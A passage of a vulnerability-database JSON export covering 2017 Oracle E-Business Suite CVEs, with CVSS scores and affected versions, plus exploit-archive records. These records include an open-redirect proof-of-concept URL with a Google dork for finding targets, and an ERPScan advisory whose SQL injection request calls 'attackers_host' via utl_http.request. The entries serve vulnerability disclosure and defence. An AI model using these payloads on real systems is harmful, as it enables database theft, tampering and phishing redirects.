"2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 7.8, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-3393"], "modified": "2019-10-03T00:03:00", "cpe": ["cpe:/a:oracle:advanced_outbound_telephony:12.2.5", "cpe:/a:oracle:advanced_outbound_telephony:12.2.3", "cpe:/a:oracle:advanced_outbound_telephony:12.2.6", "cpe:/a:oracle:advanced_outbound_telephony:12.2.4"], "id": "CVE-2017-3393", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2017-3393", "cvss": {"score": 7.8, "vector": "AV:N/AC:M/Au:N/C:P/I:C/A:N"}, "cpe23": ["cpe:2.3:a:oracle:advanced_outbound_telephony:12.2.6:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:advanced_outbound_telephony:12.2.5:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:advanced_outbound_telephony:12.2.4:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:advanced_outbound_telephony:12.2.3:*:*:*:*:*:*:*"]}, {"lastseen": "2021-02-02T06:36:44", "description": "Vulnerability in the Oracle Applications Framework component of Oracle E-Business Suite (subcomponent: Popup windows (lists of values, datepicker, etc.)). Supported versions that are affected are 12.1.3, 12.2.3, 12.2.4, 12.2.5 and 12.2.6. Easily \"exploitable\" vulnerability allows unauthenticated attacker with network access via HTTP to compromise Oracle Applications Framework. Successful attacks require human interaction from a person other than the attacker and while the vulnerability is in Oracle Applications Framework, attacks may significantly impact additional products. Successful attacks of this vulnerability can result in unauthorized update, insert or delete access to some of Oracle Applications Framework accessible data. CVSS 3.0 Base Score 4.7 (Integrity impacts). CVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:N/I:L/A:N).", "edition": 5, "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "LOW", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "LOW", "baseScore": 5.4, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:L/I:L/A:N", "userInteraction": "REQUIRED", "version": "3.0"}, "impactScore": 2.5}, "published": "2017-04-24T19:59:00", "title": "CVE-2017-3528", "type": "cve", "cwe": ["CWE-601"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "PARTIAL", "baseScore": 5.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 4.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-3528"], "modified": "2019-10-03T00:03:00", "cpe": ["cpe:/a:oracle:applications_framework:12.2.5", "cpe:/a:oracle:applications_framework:12.1.3", "cpe:/a:oracle:applications_framework:12.2.6", "cpe:/a:oracle:applications_framework:12.2.4", "cpe:/a:oracle:applications_framework:12.2.3"], "id": "CVE-2017-3528", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2017-3528", "cvss": {"score": 5.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:N"}, "cpe23": ["cpe:2.3:a:oracle:applications_framework:12.2.4:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:applications_framework:12.1.3:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:applications_framework:12.2.3:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:applications_framework:12.2.6:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:applications_framework:12.2.5:*:*:*:*:*:*:*"]}, {"lastseen": "2021-02-02T06:36:44", "description": "Vulnerability in the Oracle Scripting component of Oracle E-Business Suite (subcomponent: Scripting Administration). Supported versions that are affected are 12.1.1, 12.1.2, 12.1.3, 12.2.3, 12.2.4, 12.2.5 and 12.2.6. Easily \"exploitable\" vulnerability allows unauthenticated attacker with network access via HTTP to compromise Oracle Scripting. Successful attacks of this vulnerability can result in unauthorized creation, deletion or modification access to critical data or all Oracle Scripting accessible data as well as unauthorized access to critical data or complete access to all Oracle Scripting accessible data. CVSS 3.0 Base Score 9.1 (Confidentiality and Integrity impacts). CVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:N).", "edition": 5, "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "HIGH", "baseScore": 9.1, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:N", "userInteraction": "NONE", "version": "3.0"}, "impactScore": 5.2}, "published": "2017-04-24T19:59:00", "title": "CVE-2017-3549", "type": "cve", "cwe": ["CWE-89"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-3549"], "modified": "2019-10-03T00:03:00", "cpe": ["cpe:/a:oracle:scripting:12.2.3", "cpe:/a:oracle:scripting:12.1.3", "cpe:/a:oracle:scripting:12.1.1", "cpe:/a:oracle:scripting:12.2.5", "cpe:/a:oracle:scripting:12.2.4", "cpe:/a:oracle:scripting:12.2.6", "cpe:/a:oracle:scripting:12.1.2"], "id": "CVE-2017-3549", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2017-3549", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "cpe23": ["cpe:2.3:a:oracle:scripting:12.1.3:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:scripting:12.2.4:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:scripting:12.1.2:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:scripting:12.2.6:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:scripting:12.1.1:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:scripting:12.2.3:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:scripting:12.2.5:*:*:*:*:*:*:*"]}, {"lastseen": "2021-02-02T06:36:44", "description": "Vulnerability in the Oracle Customer Interaction History component of Oracle E-Business Suite (subcomponent: Admin Console). Supported versions that are affected are 12.1.1, 12.1.2 and 12.1.3. Easily \"exploitable\" vulnerability allows unauthenticated attacker with network access via HTTP to compromise Oracle Customer Interaction History. Successful attacks require human interaction from a person other than the attacker and while the vulnerability is in Oracle Customer Interaction History, attacks may significantly impact additional products. Successful attacks of this vulnerability can result in unauthorized access to critical data or complete access to all Oracle Customer Interaction History accessible data as well as unauthorized update, insert or delete access to some of Oracle Customer Interaction History accessible data. CVSS 3.0 Base Score 8.2 (Confidentiality and Integrity impacts). CVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:H/I:L/A:N).", "edition": 5, "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "LOW", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "HIGH", "baseScore": 7.1, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:L/I:H/A:N", "userInteraction": "REQUIRED", "version": "3.0"}, "impactScore": 4.2}, "published": "2017-04-24T19:59:00", "title": "CVE-2017-3550", "type": "cve", "cwe": ["NVD-CWE-noinfo"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-3550"], "modified": "2019-10-03T00:03:00", "cpe": ["cpe:/a:oracle:customer_interaction_history:12.1.3", "cpe:/a:oracle:customer_interaction_history:12.1.2", "cpe:/a:oracle:customer_interaction_history:12.1.1"], "id": "CVE-2017-3550", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2017-3550", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}, "cpe23": ["cpe:2.3:a:oracle:customer_interaction_history:12.1.2:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:customer_interaction_history:12.1.1:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:customer_interaction_history:12.1.3:*:*:*:*:*:*:*"]}, {"lastseen": "2021-02-02T06:36:44", "description": "Vulnerability in the Oracle One-to-One Fulfillment component of Oracle E-Business Suite (subcomponent: Audience workbench). Supported versions that are affected are 12.1.1, 12.1.2 and 12.1.3. Easily \"exploitable\" vulnerability allows unauthenticated attacker with network access via HTTP to compromise Oracle One-to-One Fulfillment. Successful attacks require human interaction from a person other than the attacker and while the vulnerability is in Oracle One-to-One Fulfillment, attacks may significantly impact additional products. Successful attacks of this vulnerability can result in unauthorized access to critical data or complete access to all Oracle One-to-One Fulfillment accessible data as well as unauthorized update, insert or delete access to some of Oracle One-to-One Fulfillment accessible data. CVSS 3.0 Base Score 8.2 (Confidentiality and Integrity impacts). CVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:H/I:L/A:N).", "edition": 5, "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "LOW", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "HIGH", "baseScore": 7.1, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:L/I:H/A:N", "userInteraction": "REQUIRED", "version": "3.0"}, "impactScore": 4.2}, "published": "2017-04-24T19:59:00", "title": "CVE-2017-3432", "type": "cve", "cwe": ["NVD-CWE-noinfo"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "COMPLETE", "baseScore": 7.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:C/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 7.8, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-3432"], "modified": "2019-10-03T00:03:00", "cpe": ["cpe:/a:oracle:one-to-one_fulfillment:12.1.2", "cpe:/a:oracle:one-to-one_fulfillment:12.1.3", "cpe:/a:oracle:one-to-one_fulfillment:12.1.1"], "id": "CVE-2017-3432", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2017-3432", "cvss": {"score": 7.8, "vector": "AV:N/AC:M/Au:N/C:P/I:C/A:N"}, "cpe23": ["cpe:2.3:a:oracle:one-to-one_fulfillment:12.1.3:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:one-to-one_fulfillment:12.1.2:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:one-to-one_fulfillment:12.1.1:*:*:*:*:*:*:*"]}, {"lastseen": "2021-02-02T06:36:44", "description": "Vulnerability in the Oracle User Management component of Oracle E-Business Suite (subcomponent: User Name/Password Management). Supported versions that are affected are 12.1.3, 12.2.3, 12.2.4, 12.2.5 and 12.2.6. Easily \"exploitable\" vulnerability allows unauthenticated attacker with network access via HTTP to compromise Oracle User Management. Successful attacks require human interaction from a person other than the attacker and while the vulnerability is in Oracle User Management, attacks may significantly impact additional products. Successful attacks of this vulnerability can result in unauthorized update, insert or delete access to some of Oracle User Management accessible data. CVSS 3.0 Base Score 4.7 (Integrity impacts). CVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:N/I:L/A:N).", "edition": 5, "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "LOW", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "LOW", "baseScore": 5.4, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:L/I:L/A:N", "userInteraction": "REQUIRED", "version": "3.0"}, "impactScore": 2.5}, "published": "2017-04-24T19:59:00", "title": "CVE-2017-3515", "type": "cve", "cwe": ["NVD-CWE-noinfo"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "PARTIAL", "baseScore": 5.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 4.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-3515"], "modified": "2019-10-03T00:03:00", "cpe": ["cpe:/a:oracle:e-business_suite:12.2.4", "cpe:/a:oracle:e-business_suite:12.1.3", "cpe:/a:oracle:e-business_suite:12.2.5", "cpe:/a:oracle:e-business_suite:12.2.3", "cpe:/a:oracle:e-business_suite:12.2.6"], "id": "CVE-2017-3515", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2017-3515", "cvss": {"score": 5.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:N"}, "cpe23": ["cpe:2.3:a:oracle:e-business_suite:12.2.3:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:e-business_suite:12.2.5:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:e-business_suite:12.2.6:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:e-business_suite:12.1.3:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:e-business_suite:12.2.4:*:*:*:*:*:*:*"]}, {"lastseen": "2021-02-02T06:36:44", "description": "Vulnerability in the Oracle Application Object Library component of Oracle E-Business Suite (subcomponent: File Management). Supported versions that are affected are 12.1.3, 12.2.3, 12.2.4, 12.2.5 and 12.2.6. Difficult to exploit vulnerability allows unauthenticated attacker with network access via HTTP to compromise Oracle Application Object Library. Successful attacks of this vulnerability can result in unauthorized read access to a subset of Oracle Application Object Library accessible data. CVSS 3.0 Base Score 3.7 (Confidentiality impacts). CVSS Vector: (CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:L/I:N/A:N).", "edition": 4, "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "LOW", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 5.3, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N", "userInteraction": "NONE", "version": "3.0"}, "impactScore": 1.4}, "published": "2017-04-24T19:59:00", "title": "CVE-2017-3556", "type": "cve", "cwe": ["CWE-200"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:P/I:N/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-3556"], "modified": "2018-12-10T19:29:00", "cpe": ["cpe:/a:oracle:application_object_library:12.2.5", "cpe:/a:oracle:application_object_library:12.2.6", "cpe:/a:oracle:application_object_library:12.2.4", "cpe:/a:oracle:application_object_library:12.1.3", "cpe:/a:oracle:application_object_library:12.2.3"], "id": "CVE-2017-3556", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2017-3556", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}, "cpe23": ["cpe:2.3:a:oracle:application_object_library:12.2.5:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:application_object_library:12.2.4:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:application_object_library:12.2.6:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:application_object_library:12.2.3:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:application_object_library:12.1.3:*:*:*:*:*:*:*"]}, {"lastseen": "2021-02-02T06:36:44", "description": "Vulnerability in the Oracle One-to-One Fulfillment component of Oracle E-Business Suite (subcomponent: Print Server). Supported versions that are affected are 12.1.3, 12.2.3, 12.2.4, 12.2.5 and 12.2.6. Easily \"exploitable\" vulnerability allows unauthenticated attacker with network access via HTTP to compromise Oracle One-to-One Fulfillment. Successful attacks require human interaction from a person other than the attacker and while the vulnerability is in Oracle One-to-One Fulfillment, attacks may significantly impact additional products. Successful attacks of this vulnerability can result in unauthorized access to critical data or complete access to all Oracle One-to-One Fulfillment accessible data as well as unauthorized update, insert or delete access to some of Oracle One-to-One Fulfillment accessible data. CVSS 3.0 Base Score 8.2 (Confidentiality and Integrity impacts). CVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:H/I:L/A:N).", "edition": 5, "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "LOW", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "HIGH", "baseScore": 7.1, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:L/I:H/A:N", "userInteraction": "REQUIRED", "version": "3.0"}, "impactScore": 4.2}, "published": "2017-04-24T19:59:00", "title": "CVE-2017-3557", "type": "cve", "cwe": ["CWE-79"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "COMPLETE", "baseScore": 7.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:C/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 7.8, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-3557"], "modified": "2019-10-03T00:03:00", "cpe": ["cpe:/a:oracle:one-to-one_fulfillment:12.2.3", "cpe:/a:oracle:one-to-one_fulfillment:12.2.6", "cpe:/a:oracle:one-to-one_fulfillment:12.1.3", "cpe:/a:oracle:one-to-one_fulfillment:12.2.5", "cpe:/a:oracle:one-to-one_fulfillment:12.2.4"], "id": "CVE-2017-3557", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2017-3557", "cvss": {"score": 7.8, "vector": "AV:N/AC:M/Au:N/C:P/I:C/A:N"}, "cpe23": ["cpe:2.3:a:oracle:one-to-one_fulfillment:12.2.3:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:one-to-one_fulfillment:12.1.3:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:one-to-one_fulfillment:12.2.4:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:one-to-one_fulfillment:12.2.5:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:one-to-one_fulfillment:12.2.6:*:*:*:*:*:*:*"]}], "packetstorm": [{"lastseen": "2018-01-16T00:22:41", "description": "", "published": "2018-01-14T00:00:00", "type": "packetstorm", "title": "Oracle E-Business Suite 12.1.3 / 12.2.x Open Redirect", "bulletinFamily": "exploit", "cvelist": ["CVE-2017-3528"], "modified": "2018-01-14T00:00:00", "id": "PACKETSTORM:145904", "href": "https://packetstormsecurity.com/files/145904/Oracle-E-Business-Suite-12.1.3-12.2.x-Open-Redirect.html", "sourceData": "`# Exploit Title: Oracle E-Business suite Open Redirect \n# Google Dork: inurl:OA_HTML/cabo/ \n# Date: April 2017 \n# Exploit Author: [author] \n# Vendor Homepage: http://www.oracle.com/technetwork/security-advisory/cpuapr2017-3236618.html \n# Software Link: [download link if available] \n# Version: Oracle E-Business Suite (REQUIRED) \n# Tested on: [relevant os] \n# CVE : CVE-2017-3528 \n \nThe exploit can be leveraged for an open redirect using the following \nexploit path: \n \nhttps://targetsite/OA_HTML/cabo/jsps/a.jsp?_t=fredRC&configName=&redirect=/\\example.com \n \nOracle E-Business suite is vulnerable to an open redirect issue, \nspecifically the redirect parameter allows any domain to be supplied \nand it will be rendered on the target's site. \n \nNote I was also credited for this CVE, see the Oracle \nCPU(http://www.oracle.com/technetwork/security-advisory/cpuapr2017-3236618.html) \n \n \n`\n", "cvss": {"score": 5.8, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:PARTIAL/I:PARTIAL/A:NONE/"}, "sourceHref": "https://packetstormsecurity.com/files/download/145904/oracleebiz12-redirect.txt"}, {"lastseen": "2017-04-20T17:25:28", "description": "", "published": "2017-04-20T00:00:00", "type": "packetstorm", "title": "Oracle E-Business Suite 12.2.3 SQL Injection", "bulletinFamily": "exploit", "cvelist": ["CVE-2017-3549"], "modified": "2017-04-20T00:00:00", "id": "PACKETSTORM:142243", "href": "https://packetstormsecurity.com/files/142243/Oracle-E-Business-Suite-12.2.3-SQL-Injection.html", "sourceData": "`Application: Oracle E-Business Suite \nVersions Affected: Oracle EBS 12.2.3 \nVendor URL: http://oracle.com \nBug: SQL injection \nReported: 23.12.2016 \nVendor response: 24.12.2016 \nDate of Public Advisory: 18.04.2017 \nReference: Oracle CPU April 2017 \nAuthor: Dmitry Chastuhin (ERPScan) \n \nDescription \n \n1. ADVISORY INFORMATION \n \nTitle:[ERPSCAN-17-021] SQL Injection in E-Business Suite IESFOOTPRINT \nAdvisory ID: [ERPSCAN-17-021] \nRisk: high \nCVE: CVE-2017-3549 \nAdvisory URL: https://erpscan.com/advisories/erpscan-17-021-sql-injection-e-business-suite-iesfootprint/ \nDate published: 18.04.2017 \nVendors contacted: Oracle \n \n \n2. VULNERABILITY INFORMATION \n \nClass: SQL injection \nImpact: read sensitive data, modify data from database \nRemotely Exploitable: yes \nLocally Exploitable: no \n \nCVSS Information \n \nCVSS Base Score v3: 8.0 / 10 \nCVSS Base Vector: \nAV : Attack Vector (Related exploit range) Network (N) \nAC : Attack Complexity (Required attack complexity) High (H) \nPR : Privileges Required (Level of privileges needed to exploit) High (H) \nUI : User Interaction (Required user participation) None (N) \nS : Scope (Change in scope due to impact caused to components beyond \nthe vulnerable component) Changed (C) \nC : Impact to Confidentiality High (H) \nI : Impact to Integrity High (H) \nA : Impact to Availability High (H) \n \n3. VULNERABILITY DESCRIPTION \n \nThe code comprises an SQL statement containing strings that can be \naltered by an attacker. The manipulated SQL statement can be used then \nto retrieve additional data from the database or to modify the data \nwithout authorization. \n \n4. VULNERABLE PACKAGES \n \nOracle EBS 12.2.3 \n \n5. SOLUTIONS AND WORKAROUNDS \n \nTo correct this vulnerability, implement Oracle CPU April 2017 \n \n6. AUTHOR \n \nDmitry Chastuhin \n \n \n7. TECHNICAL DESCRIPTION \n \nPoC \n \nvulnerable jsp name is iesfootprint.jsp \n \ndeployDate = ((request.getParameter(\"deployDate\")) != null) ? \nrequest.getParameter(\"deployDate\") : \"\"; \nresponseDate = ((request.getParameter(\"responseDate\")) != null) ? \nrequest.getParameter(\"responseDate\") : \"\"; \ndscriptName = ((request.getParameter(\"dscript_name\")) != null) ? \nrequest.getParameter(\"dscript_name\") : \"\"; \ndscriptId = ((request.getParameter(\"dscriptId\")) != null) ? \nrequest.getParameter(\"dscriptId\") : \"\"; \n%> \n \n<% \n// Process the data based on params \nif (showGraph) { \n// Create Query String \nStringBuffer query = new StringBuffer(\"SELECT panel_name, \ncount_panels, avg_time, min_time, max_time, \"); \nquery.append(\"\\'\").append(_prompts[10]).append(\"\\'\"); \nquery.append(\" Average_Time FROM (SELECT rownum, panel_name, \ncount_panels, avg_time, min_time, max_time FROM (SELECT Panel_name, \ncount(panel_name) count_panels, \n(sum(total_time)/count(panel_name))/1000 avg_time, min(min_time)/1000 \nmin_time, max(max_time)/1000 max_time FROM IES_SVY_FOOTPRINT_V WHERE \ndscript_id = \"); \nquery.append(dscriptId); \nquery.append(\" AND start_time between \"); \nquery.append(\"\\'\").append(deployDate).append(\"\\'\"); \nquery.append(\" and \"); \nquery.append(\"\\'\").append(responseDate).append(\"\\'\"); \nquery.append(\" GROUP BY panel_name ORDER BY avg_time desc)) WHERE \nrownum < 11\"); \n \n \n \n// Get XMLDocument for the corresponding query and Paint graph \ntry { \n \nXMLDocument xmlDoc = XMLServ.getSQLasXML(query.toString()); \nhtmlString =XMLServ.getXMLTransform(xmlDoc,htmlURL); \n \nApproximate request with SQL injection \n \n \nhttp://ebs.example.com/OA_HTML/iesfootprint.jsp?showgraph=true&dscriptId=11' \nAND utl_http.request('http://attackers_host/lalal')='1' GROUP BY \npanel_name)) -- \n \n \n \n \n \n8. ABOUT ERPScan Research \n \nERPScan research team specializes in vulnerability research and \nanalysis of critical enterprise applications. It was acknowledged \nmultiple times by the largest software vendors like SAP, Oracle, \nMicrosoft, IBM, VMware, HP for discovering more than 400 \nvulnerabilities in their solutions (200 of them just in SAP!). \n \nERPScan researchers are proud of discovering new types of \nvulnerabilities (TOP 10 Web Hacking Techniques 2012) and of the \"The \nBest Server-Side Bug\" nomination at BlackHat 2013. \n \nERPScan experts participated as speakers, presenters, and trainers at \n60+ prime international security conferences in 25+ countries across \nthe continents ( e.g. BlackHat, RSA, HITB) and conducted private \ntrainings for several Fortune 2000 companies. \n \nERPScan researchers carry out the EAS-SEC project that is focused on \nenterprise application security awareness by issuing annual SAP \nsecurity researches. \n \nERPScan experts were interviewed in specialized info-sec resources and \nfeatured in major media worldwide. Among them there are Reuters, \nYahoo, SC Magazine, The Register, CIO, PC World, DarkReading, Heise, \nChinabyte, etc. \n \nOur team consists of highly-qualified researchers, specialized in \nvarious fields of cybersecurity (from web application to ICS/SCADA \nsystems), gathering their experience to conduct the best SAP security \nresearch. \n \n9. ABOUT ERPScan \n \nERPScan is the most respected and credible Business Application \nCybersecurity provider. Founded in 2010, the company operates globally \nand enables large Oil and Gas, Financial, Retail and other \norganizations to secure their mission-critical processes. Named as an \naEmerging Vendora in Security by CRN, listed among aTOP 100 SAP \nSolution providersa and distinguished by 30+ other awards, ERPScan is \nthe leading SAP SE partner in discovering and resolving security \nvulnerabilities. ERPScan consultants work with SAP SE in Walldorf to \nassist in improving the security of their latest solutions. \n \nERPScanas primary mission is to close the gap between technical and \nbusiness security, and provide solutions for CISO's to evaluate and \nsecure SAP and Oracle ERP systems and business-critical applications \nfrom both cyberattacks and internal fraud. As a rule, our clients are \nlarge enterprises, Fortune 2000 companies and MSPs, whose requirements \nare to actively monitor and manage security of vast SAP and Oracle \nlandscapes on a global scale. \n \nWe afollow the suna and have two hubs, located in Palo Alto and \nAmsterdam, to provide threat intelligence services, continuous support \nand to operate local offices and partner network spanning 20+ \ncountries around the globe. \n \n \n \n \nAddress USA: 228 Hamilton Avenue, Fl. 3, Palo Alto, CA. 94301 \n \nPhone: 650.798.5255 \n \nTwitter: @erpscan \n \nScoop-it: Business Application Security \n`\n", "cvss": {"score": 0.0, "vector": "NONE"}, "sourceHref": "https://packetstormsecurity.com/files/download/142243/ERPSCAN-17-021.txt"}], "zdt": [{"lastseen": "2018-02-05T03:17:29", "description": "Exploit for jsp platform in category web applications", "edition": 1, "published": "2018-01-15T00:00:00", "type": "zdt", "title": "Oracle E-Business Suite 12.1.3/12.2.x - Open Redirect Vulnerability", "bulletinFamily": "exploit", "cvelist": ["CVE-2017-3528"], "modified": "2018-01-15T00:00:00", "href": "https://0day.today/exploit/description/29501", "id": "1337DAY-ID-29501", "sourceData": "# Exploit Title: Oracle E-Business suite Open Redirect\r\n# Google Dork: inurl:OA_HTML/cabo/\r\n# Date: April 2017\r\n# Exploit Author: [author]\r\n# Vendor Homepage: http://www.oracle.com/technetwork/security-advisory/cpuapr2017-3236618.html\r\n# Software Link: [download link if available]\r\n# Version: Oracle E-Business Suite (REQUIRED)\r\n# Tested on: [relevant os]\r\n# CVE : CVE-2017-3528\r\n \r\nThe exploit can be leveraged for an open redirect using the following\r\nexploit path:\r\n \r\nhttps://targetsite/OA_HTML/cabo/jsps/a.jsp?_t=fredRC&configName=&redirect=/\\example.com\r\n \r\nOracle E-Business suite is vulnerable to an open redirect issue,\r\nspecifically the redirect parameter allows any domain to be supplied\r\nand it will be rendered on the target's site.\r\n \r\nNote I was also credited for this CVE, see the 